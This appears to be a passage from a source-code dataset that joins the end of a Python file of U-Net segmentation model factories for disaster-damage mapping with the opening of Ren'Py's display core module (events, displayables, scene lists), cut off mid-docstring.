abn_block=partial(ABN, activation=ACT_RELU),
)
def resnet34_unet_v2(input_channels=6, num_classes=5, dropout=0.0, pretrained=True, classifiers=True):
encoder = E.Resnet34Encoder(pretrained=pretrained, layers=[0, 1, 2, 3, 4])
return UnetV2SegmentationModel(
encoder,
num_classes=num_classes,
disaster_type_classes=len(DISASTER_TYPES) if classifiers else None,
damage_type_classes=len(DAMAGE_TYPES) if classifiers else None,
unet_channels=[64, 128, 256, 256],
dropout=dropout,
abn_block=partial(ABN, activation=ACT_RELU),
)
def resnet50_unet_v2(input_channels=6, num_classes=5, dropout=0.0, pretrained=True, classifiers=True):
encoder = E.Resnet50Encoder(pretrained=pretrained, layers=[0, 1, 2, 3, 4])
return UnetV2SegmentationModel(
encoder,
num_classes=num_classes,
disaster_type_classes=len(DISASTER_TYPES) if classifiers else None,
damage_type_classes=len(DAMAGE_TYPES) if classifiers else None,
unet_channels=[96, 128, 256, 256],
dropout=dropout,
abn_block=partial(ABN, activation=ACT_RELU),
)
def resnet101_unet_v2(input_channels=6, num_classes=5, dropout=0.0, pretrained=True, classifiers=True):
encoder = E.Resnet101Encoder(pretrained=pretrained, layers=[0, 1, 2, 3, 4])
return UnetV2SegmentationModel(
encoder,
num_classes=num_classes,
disaster_type_classes=len(DISASTER_TYPES) if classifiers else None,
damage_type_classes=len(DAMAGE_TYPES) if classifiers else None,
unet_channels=[64, 128, 256, 384],
dropout=dropout,
abn_block=partial(ABN, activation=ACT_RELU),
)
def seresnext50_unet_v2(input_channels=6, num_classes=5, dropout=0.0, pretrained=True, classifiers=True):
encoder = E.SEResNeXt50Encoder(pretrained=pretrained, layers=[0, 1, 2, 3, 4])
return UnetV2SegmentationModel(
encoder,
num_classes=num_classes,
disaster_type_classes=len(DISASTER_TYPES) if classifiers else None,
damage_type_classes=len(DAMAGE_TYPES) if classifiers else None,
unet_channels=[64, 128, 256, 256],
dropout=dropout,
abn_block=partial(ABN, activation=ACT_RELU),
)
def seresnext101_unet_v2(input_channels=6, num_classes=5, dropout=0.0, pretrained=True, classifiers=True):
encoder = E.SEResNeXt101Encoder(pretrained=pretrained, layers=[0, 1, 2, 3, 4])
return UnetV2SegmentationModel(
encoder,
num_classes=num_classes,
disaster_type_classes=len(DISASTER_TYPES) if classifiers else None,
damage_type_classes=len(DAMAGE_TYPES) if classifiers else None,
unet_channels=[128, 128, 256, 384],
dropout=dropout,
abn_block=partial(ABN, activation=ACT_RELU),
)
| true | true |
f72ecbbcaf235e8b00e8f6b45bc705145e916d73 | 107,466 | py | Python | TEST_PROJET-1.0-pc/renpy/display/core.py | Dune0lyn/otome | e365b474e7df3f76ccc0853fd1665f6529a59304 | [
"CC0-1.0"
] | null | null | null | TEST_PROJET-1.0-pc/renpy/display/core.py | Dune0lyn/otome | e365b474e7df3f76ccc0853fd1665f6529a59304 | [
"CC0-1.0"
] | null | null | null | TEST_PROJET-1.0-pc/renpy/display/core.py | Dune0lyn/otome | e365b474e7df3f76ccc0853fd1665f6529a59304 | [
"CC0-1.0"
] | null | null | null | # Copyright 2004-2019 Tom Rothamel <pytom@bishoujo.us>
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation files
# (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge,
# publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE
# LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION
# OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION
# WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
# This file contains code for initializing and managing the display
# window.
from __future__ import print_function
import renpy.display
import renpy.audio
import renpy.text
import renpy.test
import pygame_sdl2 as pygame
import sys
import os
import time
import cStringIO
import threading
import copy
import gc
import inspect
import_time = time.time()
try:
import android # @UnresolvedImport
except:
android = None
TIMEEVENT = pygame.event.register("TIMEEVENT")
PERIODIC = pygame.event.register("PERIODIC")
REDRAW = pygame.event.register("REDRAW")
EVENTNAME = pygame.event.register("EVENTNAME")
# All events except for TIMEEVENT and REDRAW
ALL_EVENTS = set(pygame.event.get_standard_events()) # @UndefinedVariable
ALL_EVENTS.add(PERIODIC)
ALL_EVENTS.add(EVENTNAME)
enabled_events = {
pygame.QUIT,
pygame.APP_TERMINATING,
pygame.APP_LOWMEMORY,
pygame.APP_WILLENTERBACKGROUND,
pygame.APP_DIDENTERBACKGROUND,
pygame.APP_WILLENTERFOREGROUND,
pygame.APP_DIDENTERFOREGROUND,
pygame.WINDOWEVENT,
pygame.SYSWMEVENT,
pygame.KEYDOWN,
pygame.KEYUP,
pygame.TEXTEDITING,
pygame.TEXTINPUT,
pygame.MOUSEMOTION,
pygame.MOUSEBUTTONDOWN,
pygame.MOUSEBUTTONUP,
pygame.MOUSEWHEEL,
pygame.JOYAXISMOTION,
pygame.JOYHATMOTION,
pygame.JOYBALLMOTION,
pygame.JOYBUTTONDOWN,
pygame.JOYBUTTONUP,
pygame.JOYDEVICEADDED,
pygame.JOYDEVICEREMOVED,
pygame.CONTROLLERAXISMOTION,
pygame.CONTROLLERBUTTONDOWN,
pygame.CONTROLLERBUTTONUP,
pygame.CONTROLLERDEVICEADDED,
pygame.CONTROLLERDEVICEREMOVED,
pygame.RENDER_TARGETS_RESET,
TIMEEVENT,
PERIODIC,
REDRAW,
EVENTNAME,
}
# The number of msec between periodic events.
PERIODIC_INTERVAL = 50
# Time management.
time_base = 0.0
time_mult = 1.0
def init_time():
warp = os.environ.get("RENPY_TIMEWARP", "1.0")
global time_base
global time_mult
time_base = time.time()
time_mult = float(warp)
def get_time():
t = time.time()
return time_base + (t - time_base) * time_mult
def displayable_by_tag(layer, tag):
"""
Get the displayable on the given layer with the given tag.
"""
return renpy.game.context().scene_lists.get_displayable_by_tag(layer, tag)
class IgnoreEvent(Exception):
"""
Exception that is raised when we want to ignore an event, but
also don't want to return anything.
"""
pass
class EndInteraction(Exception):
"""
Exception that can be raised (for example, during the render method of
a displayable) to end the current interaction immediately.
"""
def __init__(self, value):
self.value = value
class absolute(float):
"""
This represents an absolute float coordinate.
"""
__slots__ = [ ]
def place(width, height, sw, sh, placement):
"""
Performs the Ren'Py placement algorithm.
`width`, `height`
The width and height of the area the image will be
placed in.
`size`
The size of the image to be placed.
`placement`
The tuple returned by Displayable.get_placement().
"""
xpos, ypos, xanchor, yanchor, xoffset, yoffset, _subpixel = placement
if xpos is None:
xpos = 0
if ypos is None:
ypos = 0
if xanchor is None:
xanchor = 0
if yanchor is None:
yanchor = 0
if xoffset is None:
xoffset = 0
if yoffset is None:
yoffset = 0
# We need to use type, since isinstance(absolute(0), float).
if xpos.__class__ is float:
xpos *= width
if xanchor.__class__ is float:
xanchor *= sw
x = xpos + xoffset - xanchor
if ypos.__class__ is float:
ypos *= height
if yanchor.__class__ is float:
yanchor *= sh
y = ypos + yoffset - yanchor
return x, y
class DisplayableArguments(renpy.object.Object):
"""
Represents a set of arguments that can be passed to a duplicated
displayable.
"""
# The name of the displayable without any arguments.
name = ()
# Arguments supplied.
args = ()
# The style prefix in play. This is used by DynamicImage to figure
# out the prefix list to apply.
prefix = None
# True if lint is in use.
lint = False
def copy(self, **kwargs):
"""
Returns a copy of this object with the various fields set to the
values they were given in kwargs.
"""
rv = DisplayableArguments()
rv.__dict__.update(self.__dict__)
rv.__dict__.update(kwargs)
return rv
def extraneous(self):
if renpy.config.developer and renpy.config.report_extraneous_attributes:
raise Exception("Image '{}' does not accept attributes '{}'.".format(
" ".join(self.name),
" ".join(self.args),
))
default_style = renpy.style.Style("default")
class Displayable(renpy.object.Object):
"""
The base class for every object in Ren'Py that can be
displayed to the screen.
Drawables will be serialized to a savegame file. Therefore, they
shouldn't store non-serializable things (like pygame surfaces) in
their fields.
"""
# Some invariants about method call order:
#
# per_interact is called before render.
# render is called before event.
#
# get_placement can be called at any time, so can't
# assume anything.
# If True this displayable can accept focus.
# If False, it can't, but it keeps its place in the focus order.
# If None, it does not have a place in the focus order.
focusable = None
# This is the focus named assigned by the focus code.
full_focus_name = None
# A role ('selected_' or '' that prefixes the style).
role = ''
# The event we'll pass on to our parent transform.
transform_event = None
# Can we change our look in response to transform_events?
transform_event_responder = False
# The main displayable, if this displayable is the root of a composite
# displayable. (This is used by SL to figure out where to add children
# to.) If None, it is itself.
_main = None
# A list of the children that make up this composite displayable.
_composite_parts = [ ]
# The location the displayable was created at, if known.
_location = None
# Does this displayable use the scope?
_uses_scope = False
# Arguments supplied to this displayable.
_args = DisplayableArguments()
# Set to true of the displayable is duplicatable (has a non-trivial
# duplicate method), or one of its children is.
_duplicatable = False
# Does this displayable require clipping?
_clipping = False
# Does this displayable have a tooltip?
_tooltip = None
def __ne__(self, o):
return not (self == o)
def __init__(self, focus=None, default=False, style='default', _args=None, tooltip=None, default_focus=False, **properties):
global default_style
if (style == "default") and (not properties):
self.style = default_style
else:
self.style = renpy.style.Style(style, properties) # @UndefinedVariable
self.focus_name = focus
self.default = default or default_focus
self._tooltip = tooltip
if _args is not None:
self._args = _args
def _copy(self, args=None):
"""
Makes a shallow copy of the displayable. If `args` is provided,
replaces the arguments with the stored copy.
"""
rv = copy.copy(self)
if args is not None:
rv._args = args
return rv
def _duplicate(self, args):
"""
Makes a duplicate copy of the following kids of displayables:
* Displayables that can accept arguments.
* Displayables that maintain state that should be reset before being
shown to the user.
* Containers that contain (including transitively) one of the other
kinds of displayables.
Displayables that contain state that can be manipulated by the user
are never copied.
This should call _unique on children that have been copied before
setting its own _duplicatable flag.
"""
if args and args.args:
args.extraneous()
return self
def _get_tooltip(self):
"""
Returns the tooltip of this displayable.
"""
return self._tooltip
def _in_current_store(self):
"""
Returns a version of this displayable that will not change as it is
rendered.
"""
return self
def _unique(self):
"""
This is called when a displayable is "born" unique, which occurs
when there is only a single reference to it. What it does is to
manage the _duplicatable flag - setting it false unless one of
the displayable's children happens to be duplicatable.
"""
return
def parameterize(self, name, parameters):
"""
Obsolete alias for _duplicate.
"""
a = self._args.copy(name=name, args=parameters)
return self._duplicate(a)
def _equals(self, o):
"""
This is a utility method that can be called by a Displayable's
__eq__ method, to compare displayables for type and displayable
component equality.
"""
if type(self) is not type(o):
return False
if self.focus_name != o.focus_name:
return False
if self.style != o.style:
return False
if self.default != o.default:
return False
return True
def __unicode__(self):
return self.__class__.__name__
def __repr__(self):
return "<{} at {:x}>".format(unicode(self).encode("utf-8"), id(self))
def find_focusable(self, callback, focus_name):
focus_name = self.focus_name or focus_name
if self.focusable:
callback(self, focus_name)
elif self.focusable is not None:
callback(None, focus_name)
for i in self.visit():
if i is None:
continue
i.find_focusable(callback, focus_name)
def focus(self, default=False):
"""
Called to indicate that this widget has the focus.
"""
self.set_style_prefix(self.role + "hover_", True)
if not default:
renpy.exports.play(self.style.hover_sound)
def unfocus(self, default=False):
"""
Called to indicate that this widget has become unfocused.
"""
self.set_style_prefix(self.role + "idle_", True)
def is_focused(self):
if renpy.display.focus.grab and renpy.display.focus.grab is not self:
return
return renpy.game.context().scene_lists.focused is self
def set_style_prefix(self, prefix, root):
"""
Called to set the style prefix of this widget and its child
widgets, if any.
`root` - True if this is the root of a style tree, False if this
has been passed on to a child.
"""
if prefix == self.style.prefix:
return
self.style.set_prefix(prefix)
renpy.display.render.redraw(self, 0)
def render(self, width, height, st, at):
"""
Called to display this displayable. This is called with width
and height parameters, which give the largest width and height
that this drawable can be drawn to without overflowing some
bounding box. It's also given two times. It returns a Surface
that is the current image of this drawable.
@param st: The time since this widget was first shown, in seconds.
@param at: The time since a similarly named widget was first shown,
in seconds.
"""
raise Exception("Render not implemented.")
def event(self, ev, x, y, st):
"""
Called to report than an event has occured. Ev is the raw
pygame event object representing that event. If the event
involves the mouse, x and y are the translation of the event
into the coordinates of this displayable. st is the time this
widget has been shown for.
@returns A value that should be returned from Interact, or None if
no value is appropriate.
"""
return None
def get_placement(self):
"""
Returns a style object containing placement information for
this Displayable. Children are expected to overload this
to return something more sensible.
"""
return self.style.get_placement()
def visit_all(self, callback, seen=None):
"""
Calls the callback on this displayable, and then on all children
of this displayable.
"""
if seen is None:
seen = set()
for d in self.visit():
if d is None:
continue
id_d = id(d)
if id_d in seen:
continue
seen.add(id_d)
d.visit_all(callback, seen)
callback(self)
def visit(self):
"""
Called to ask the displayable to return a list of its children
(including children taken from styles). For convenience, this
list may also include None values.
"""
return [ ]
def per_interact(self):
"""
Called once per widget per interaction.
"""
return None
def predict_one(self):
"""
Called to ask this displayable to call the callback with all
the images it may want to load.
"""
return
def predict_one_action(self):
"""
Called to ask this displayable to cause image prediction
to occur for images that may be loaded by its actions.
"""
return
def place(self, dest, x, y, width, height, surf, main=True):
"""
This places a render (which must be of this displayable)
within a bounding area. Returns an (x, y) tuple giving the location
the displayable was placed at.
`dest`
If not None, the `surf` will be blitted to `dest` at the
computed coordinates.
`x`, `y`, `width`, `height`
The bounding area.
`surf`
The render to place.
`main`
This is passed to Render.blit().
"""
placement = self.get_placement()
subpixel = placement[6]
xpos, ypos = place(width, height, surf.width, surf.height, placement)
xpos += x
ypos += y
pos = (xpos, ypos)
if dest is not None:
if subpixel:
dest.subpixel_blit(surf, pos, main, main, None)
else:
dest.blit(surf, pos, main, main, None)
return pos
def set_transform_event(self, event):
"""
Sets the transform event of this displayable to event.
"""
if event == self.transform_event:
return
self.transform_event = event
if self.transform_event_responder:
renpy.display.render.redraw(self, 0)
def _handles_event(self, event):
"""
Returns True if the displayable handles event, False otherwise.
"""
return False
def _hide(self, st, at, kind):
"""
Returns None if this displayable is ready to be hidden, or
a replacement displayable if it doesn't want to be hidden
quite yet. Kind is either "hide" or "replaced".
"""
return None
def _show(self):
"""
Called when the displayable is added to a scene list.
"""
def _target(self):
"""
If this displayable is part of a chain of one or more references,
returns the ultimate target of those references. Otherwise, returns
the displayable.
"""
return self
def _change_transform_child(self, child):
"""
If this is a transform, makes a copy of the transform and sets
the child of the innermost transform to this. Otherwise,
simply returns child.
"""
return child
def _clear(self):
"""
Clears out the children of this displayable, if any.
"""
return
def _tts_common(self, default_alt=None):
rv = [ ]
for i in self.visit():
if i is not None:
speech = i._tts()
if speech.strip():
rv.append(speech)
rv = ": ".join(rv)
rv = rv.replace("::", ":")
rv = rv.replace(": :", ":")
alt = self.style.alt
if alt is None:
alt = default_alt
if alt is not None:
rv = renpy.substitutions.substitute(alt, scope={ "text" : rv })[0]
return rv
def _tts(self):
"""
Returns the self-voicing text of this displayable and all of its
children that cannot take focus. If the displayable can take focus,
returns the empty string.
"""
return self._tts_common()
def _tts_all(self):
"""
Returns the self-voicing text of this displayable and all of its
children that cannot take focus.
"""
return self._tts_common()
class SceneListEntry(renpy.object.Object):
"""
Represents a scene list entry. Since this was replacing a tuple,
it should be treated as immutable after its initial creation.
"""
def __init__(self, tag, zorder, show_time, animation_time, displayable, name):
self.tag = tag
self.zorder = zorder
self.show_time = show_time
self.animation_time = animation_time
self.displayable = displayable
self.name = name
def __iter__(self):
return iter((self.tag, self.zorder, self.show_time, self.animation_time, self.displayable))
def __getitem__(self, index):
return (self.tag, self.zorder, self.show_time, self.animation_time, self.displayable)[index]
def __repr__(self):
return "<SLE: %r %r %r>" % (self.tag, self.name, self.displayable)
def copy(self):
return SceneListEntry(
self.tag,
self.zorder,
self.show_time,
self.animation_time,
self.displayable,
self.name)
def update_time(self, time):
rv = self
if self.show_time is None or self.animation_time is None:
rv = self.copy()
rv.show_time = rv.show_time or time
rv.animation_time = rv.animation_time or time
return rv
class SceneLists(renpy.object.Object):
"""
This stores the current scene lists that are being used to display
things to the user.
"""
__version__ = 7
def after_setstate(self):
for i in renpy.config.layers + renpy.config.top_layers:
if i not in self.layers:
self.layers[i] = [ ]
self.at_list[i] = { }
self.layer_at_list[i] = (None, [ ])
def after_upgrade(self, version):
if version < 1:
self.at_list = { }
self.layer_at_list = { }
for i in renpy.config.layers + renpy.config.top_layers:
self.at_list[i] = { }
self.layer_at_list[i] = (None, [ ])
if version < 3:
self.shown_window = False
if version < 4:
for k in self.layers:
self.layers[k] = [ SceneListEntry(*(i + (None,)) ) for i in self.layers[k] ]
self.additional_transient = [ ]
if version < 5:
self.drag_group = None
if version < 6:
self.shown = self.image_predict_info
if version < 7:
self.layer_transform = { }
def __init__(self, oldsl, shown):
super(SceneLists, self).__init__()
# Has a window been shown as part of these scene lists?
self.shown_window = False
# A map from layer name -> list(SceneListEntry)
self.layers = { }
# A map from layer name -> tag -> at_list associated with that tag.
self.at_list = { }
# A map from layer to (star time, at_list), where the at list has
# been applied to the layer as a whole.
self.layer_at_list = { }
# The current shown images,
self.shown = shown
# A list of (layer, tag) pairs that are considered to be
# transient.
self.additional_transient = [ ]
# Either None, or a DragGroup that's used as the default for
# drags with names.
self.drag_group = None
# A map from a layer to the transform that applies to that
# layer.
self.layer_transform = { }
if oldsl:
for i in renpy.config.layers + renpy.config.top_layers:
try:
self.layers[i] = oldsl.layers[i][:]
except KeyError:
self.layers[i] = [ ]
if i in oldsl.at_list:
self.at_list[i] = oldsl.at_list[i].copy()
self.layer_at_list[i] = oldsl.layer_at_list[i]
else:
self.at_list[i] = { }
self.layer_at_list[i] = (None, [ ])
for i in renpy.config.overlay_layers:
self.clear(i)
self.replace_transient(prefix=None)
self.focused = None
self.drag_group = oldsl.drag_group
self.layer_transform.update(oldsl.layer_transform)
else:
for i in renpy.config.layers + renpy.config.top_layers:
self.layers[i] = [ ]
self.at_list[i] = { }
self.layer_at_list[i] = (None, [ ])
self.music = None
self.focused = None
def replace_transient(self, prefix="hide"):
"""
Replaces the contents of the transient display list with
a copy of the master display list. This is used after a
scene is displayed to get rid of transitions and interface
elements.
`prefix`
The prefix/event to use. Set this to None to prevent the hide
from happening.
"""
for i in renpy.config.transient_layers:
self.clear(i, True)
for layer, tag in self.additional_transient:
self.remove(layer, tag, prefix=prefix)
self.additional_transient = [ ]
def transient_is_empty(self):
"""
This returns True if all transient layers are empty. This is
used by the rollback code, as we can't start a new rollback
if there is something in a transient layer (as things in the
transient layer may contain objects that cannot be pickled,
like lambdas.)
"""
for i in renpy.config.transient_layers:
if self.layers[i]:
return False
return True
def transform_state(self, old_thing, new_thing, execution=False):
"""
If the old thing is a transform, then move the state of that transform
to the new thing.
"""
if old_thing is None:
return new_thing
# Don't bother wrapping screens, as they can't be transformed.
if isinstance(new_thing, renpy.display.screen.ScreenDisplayable):
return new_thing
if renpy.config.take_state_from_target:
old_transform = old_thing._target()
else:
old_transform = old_thing
if not isinstance(old_transform, renpy.display.motion.Transform):
return new_thing
if renpy.config.take_state_from_target:
new_transform = new_thing._target()
else:
new_transform = new_thing
if not isinstance(new_transform, renpy.display.motion.Transform):
new_thing = new_transform = renpy.display.motion.Transform(child=new_thing)
new_transform.take_state(old_transform)
if execution:
new_transform.take_execution_state(old_transform)
return new_thing
def find_index(self, layer, tag, zorder, behind):
"""
This finds the spot in the named layer where we should insert the
displayable. It returns two things: an index at which the new thing
should be added, and an index at which the old thing should be hidden.
(Note that the indexes are relative to the current state of the list,
which may change on an add or remove.)
"""
add_index = None
remove_index = None
for i, sle in enumerate(self.layers[layer]):
if remove_index is None:
if (sle.tag and sle.tag == tag) or sle.displayable == tag:
remove_index = i
if zorder is None:
zorder = sle.zorder
if zorder is None:
zorder = renpy.config.tag_zorder.get(tag, 0)
for i, sle in enumerate(self.layers[layer]):
if add_index is None:
if sle.zorder == zorder:
if sle.tag and (sle.tag == tag or sle.tag in behind):
add_index = i
elif sle.zorder > zorder:
add_index = i
if add_index is None:
add_index = len(self.layers[layer])
return add_index, remove_index, zorder
def add(self,
layer,
thing,
key=None,
zorder=0,
behind=[ ],
at_list=[ ],
name=None,
atl=None,
default_transform=None,
transient=False,
keep_st=False):
"""
Adds something to this scene list. Some of these names are quite a bit
out of date.
`thing` - The displayable to add.
`key` - A string giving the tag associated with this thing.
`zorder` - Where to place this thing in the zorder, an integer
A greater value means closer to the user.
`behind` - A list of tags to place the thing behind.
`at_list` - The at_list associated with this
displayable. Counterintunitively, this is not actually
applied, but merely stored for future use.
`name` - The full name of the image being displayed. This is used for
image lookup.
`atl` - If not None, an atl block applied to the thing. (This actually is
applied here.)
`default_transform` - The default transform that is used to initialized
the values in the other transforms.
`keep_st`
If true, we preserve the shown time of a replaced displayable.
"""
if not isinstance(thing, Displayable):
raise Exception("Attempting to show something that isn't a displayable:" + repr(thing))
if layer not in self.layers:
raise Exception("Trying to add something to non-existent layer '%s'." % layer)
if key:
self.remove_hide_replaced(layer, key)
self.at_list[layer][key] = at_list
if key and name:
self.shown.predict_show(layer, name)
if transient:
self.additional_transient.append((layer, key))
l = self.layers[layer]
if atl:
thing = renpy.display.motion.ATLTransform(atl, child=thing)
add_index, remove_index, zorder = self.find_index(layer, key, zorder, behind)
at = None
st = None
if remove_index is not None:
sle = l[remove_index]
old = sle.displayable
at = sle.animation_time
if keep_st:
st = sle.show_time
if (not atl and
not at_list and
renpy.config.keep_running_transform and
isinstance(old, renpy.display.motion.Transform)):
thing = sle.displayable._change_transform_child(thing)
else:
thing = self.transform_state(l[remove_index].displayable, thing)
thing.set_transform_event("replace")
thing._show()
else:
if not isinstance(thing, renpy.display.motion.Transform):
thing = self.transform_state(default_transform, thing)
thing.set_transform_event("show")
thing._show()
sle = SceneListEntry(key, zorder, st, at, thing, name)
l.insert(add_index, sle)
if remove_index is not None:
if add_index <= remove_index:
remove_index += 1
self.hide_or_replace(layer, remove_index, "replaced")
def hide_or_replace(self, layer, index, prefix):
"""
Hides or replaces the scene list entry at the given
index. `prefix` is a prefix that is used if the entry
decides it doesn't want to be hidden quite yet.
"""
if index is None:
return
l = self.layers[layer]
oldsle = l[index]
now = get_time()
st = oldsle.show_time or now
at = oldsle.animation_time or now
if renpy.config.fast_unhandled_event:
if not oldsle.displayable._handles_event(prefix):
prefix = None
if (prefix is not None) and oldsle.tag:
d = oldsle.displayable._hide(now - st, now - at, prefix)
# _hide can mutate the layers, so we need to recompute
# index.
index = l.index(oldsle)
if d is not None:
sle = SceneListEntry(
prefix + "$" + oldsle.tag,
oldsle.zorder,
st,
at,
d,
None)
l[index] = sle
return
l.pop(index)
def get_all_displayables(self):
"""
Gets all displayables reachable from this scene list.
"""
rv = [ ]
for l in self.layers.itervalues():
for sle in l:
rv.append(sle.displayable)
return rv
def remove_above(self, layer, thing):
"""
Removes everything on the layer that is closer to the user
than thing, which may be either a tag or a displayable. Thing must
be displayed, or everything will be removed.
"""
for i in reversed(xrange(len(self.layers[layer]))):
sle = self.layers[layer][i]
if thing:
if sle.tag == thing or sle.displayable == thing:
break
if sle.tag and "$" in sle.tag:
continue
self.hide_or_replace(layer, i, "hide")
def remove(self, layer, thing, prefix="hide"):
"""
Thing is either a key or a displayable. This iterates through the
named layer, searching for entries matching the thing.
When they are found, they are removed from the displaylist.
It's not an error to remove something that isn't in the layer in
the first place.
"""
if layer not in self.layers:
raise Exception("Trying to remove something from non-existent layer '%s'." % layer)
_add_index, remove_index, _zorder = self.find_index(layer, thing, 0, [ ])
if remove_index is not None:
tag = self.layers[layer][remove_index].tag
if tag:
self.shown.predict_hide(layer, (tag,))
self.at_list[layer].pop(tag, None)
self.hide_or_replace(layer, remove_index, prefix)
def clear(self, layer, hide=False):
"""
Clears the named layer, making it empty.
If hide is True, then objects are hidden. Otherwise, they are
totally wiped out.
"""
if layer not in self.layers:
return
if not hide:
self.layers[layer] = [ ]
else:
# Have to iterate in reverse order, since otherwise
# the indexes might change.
for i in reversed(xrange(len(self.layers[layer]))):
self.hide_or_replace(layer, i, hide)
self.at_list[layer].clear()
self.shown.predict_scene(layer)
self.layer_at_list[layer] = (None, [ ])
def set_layer_at_list(self, layer, at_list, reset=True):
self.layer_at_list[layer] = (None, list(at_list))
if reset:
self.layer_transform[layer] = None
def set_times(self, time):
"""
This finds entries with a time of None, and replaces that
time with the given time.
"""
for l, (t, list) in self.layer_at_list.items(): # @ReservedAssignment
self.layer_at_list[l] = (t or time, list)
for l, ll in self.layers.iteritems():
self.layers[l] = [ i.update_time(time) for i in ll ]
def showing(self, layer, name):
"""
Returns true if something with the prefix of the given name
is found in the scene list.
"""
return self.shown.showing(layer, name)
def get_showing_tags(self, layer):
return self.shown.get_showing_tags(layer)
def get_sorted_tags(self, layer):
rv = [ ]
for sle in self.layers[layer]:
if not sle.tag:
continue
if "$" in sle.tag:
continue
rv.append(sle.tag)
return rv
def make_layer(self, layer, properties):
"""
Creates a Fixed with the given layer name and scene_list.
"""
rv = renpy.display.layout.MultiBox(layout='fixed', focus=layer, **properties)
rv.append_scene_list(self.layers[layer])
rv.layer_name = layer
rv._duplicatable = False
time, at_list = self.layer_at_list[layer]
old_transform = self.layer_transform.get(layer, None)
new_transform = None
if at_list:
for a in at_list:
if isinstance(a, renpy.display.motion.Transform):
rv = a(child=rv)
new_transform = rv
else:
rv = a(rv)
if (new_transform is not None) and (renpy.config.keep_show_layer_state):
self.transform_state(old_transform, new_transform, execution=True)
f = renpy.display.layout.MultiBox(layout='fixed')
f.add(rv, time, time)
f.layer_name = layer
rv = f
self.layer_transform[layer] = new_transform
return rv
def remove_hide_replaced(self, layer, tag):
"""
Removes things that are hiding or replaced, that have the given
tag.
"""
hide_tag = "hide$" + tag
replaced_tag = "replaced$" + tag
l = self.layers[layer]
self.layers[layer] = [ i for i in l if i.tag != hide_tag and i.tag != replaced_tag ]
def remove_hidden(self):
"""
Goes through all of the layers, and removes things that are
hidden and are no longer being kept alive by their hide
methods.
"""
now = get_time()
for l in self.layers:
newl = [ ]
for sle in self.layers[l]:
if sle.tag:
if sle.tag.startswith("hide$"):
d = sle.displayable._hide(now - sle.show_time, now - sle.animation_time, "hide")
if not d:
continue
elif sle.tag.startswith("replaced$"):
d = sle.displayable._hide(now - sle.show_time, now - sle.animation_time, "replaced")
if not d:
continue
newl.append(sle)
self.layers[l] = newl
def remove_all_hidden(self):
"""
Removes everything hidden, even if it's not time yet. (Used when making a rollback copy).
"""
for l in self.layers:
newl = [ ]
for sle in self.layers[l]:
if sle.tag:
if "$" in sle.tag:
continue
newl.append(sle)
self.layers[l] = newl
def get_displayable_by_tag(self, layer, tag):
"""
Returns the displayable on the layer with the given tag, or None
if no such displayable exists. Note that this will usually return
a Transform.
"""
if layer not in self.layers:
raise Exception("Unknown layer %r." % layer)
for sle in self.layers[layer]:
if sle.tag == tag:
return sle.displayable
return None
def get_displayable_by_name(self, layer, name):
"""
Returns the displayable on the layer with the given name, or None
if no such displayable exists. Note that this will usually return
a Transform.
"""
if layer not in self.layers:
raise Exception("Unknown layer %r." % layer)
for sle in self.layers[layer]:
if sle.name == name:
return sle.displayable
return None
def get_image_bounds(self, layer, tag, width, height):
"""
Implements renpy.get_image_bounds().
"""
if layer not in self.layers:
raise Exception("Unknown layer %r." % layer)
for sle in self.layers[layer]:
if sle.tag == tag:
break
else:
return None
now = get_time()
if sle.show_time is not None:
st = now - sle.show_time
else:
st = 0
if sle.animation_time is not None:
at = now - sle.animation_time
else:
at = 0
surf = renpy.display.render.render_for_size(sle.displayable, width, height, st, at)
sw = surf.width
sh = surf.height
x, y = place(width, height, sw, sh, sle.displayable.get_placement())
return (x, y, sw, sh)
def scene_lists(index=-1):
"""
Returns either the current scenelists object, or the one for the
context at the given index.
"""
return renpy.game.context(index).scene_lists
class MouseMove(object):
"""
This contains information about the current mouse move.
"""
def __init__(self, x, y, duration):
self.start = get_time()
if duration is not None:
self.duration = duration
else:
self.duration = 0
self.start_x, self.start_y = renpy.display.draw.get_mouse_pos()
self.end_x = x
self.end_y = y
def perform(self):
"""
Performs the mouse move. Returns True if this should be called
again, or False if the move has finished.
"""
elapsed = get_time() - self.start
if elapsed >= self.duration:
renpy.display.draw.set_mouse_pos(self.end_x, self.end_y)
return False
done = 1.0 * elapsed / self.duration
x = int(self.start_x + done * (self.end_x - self.start_x))
y = int(self.start_y + done * (self.end_y - self.start_y))
renpy.display.draw.set_mouse_pos(x, y)
return True
def get_safe_mode():
"""
Returns true if we should go into safe mode.
"""
if renpy.safe_mode_checked:
return False
try:
if renpy.windows:
import ctypes
VK_SHIFT = 0x10
ctypes.windll.user32.GetKeyState.restype = ctypes.c_ushort
if ctypes.windll.user32.GetKeyState(VK_SHIFT) & 0x8000:
return True
else:
return False
# Safe mode doesn't work on other platforms.
return False
except:
return False
# How long should we be in maximum framerate mode at the start of the game?
initial_maximum_framerate = 0.0
class Interface(object):
"""
This represents the user interface that interacts with the user.
It manages the Display objects that display things to the user, and
also handles accepting and responding to user input.
@ivar display: The display that we used to display the screen.
@ivar profile_time: The time of the last profiling.
@ivar screenshot: A screenshot, or None if no screenshot has been
taken.
@ivar old_scene: The last thing that was displayed to the screen.
@ivar transition: A map from layer name to the transition that will
be applied the next time interact restarts.
@ivar transition_time: A map from layer name to the time the transition
involving that layer started.
@ivar transition_from: A map from layer name to the scene that we're
transitioning from on that layer.
@ivar suppress_transition: If True, then the next transition will not
happen.
@ivar force_redraw: If True, a redraw is forced.
@ivar restart_interaction: If True, the current interaction will
be restarted.
@ivar pushed_event: If not None, an event that was pushed back
onto the stack.
@ivar mouse: The name of the mouse cursor to use during the current
interaction.
@ivar ticks: The number of 20hz ticks.
@ivar frame_time: The time at which we began drawing this frame.
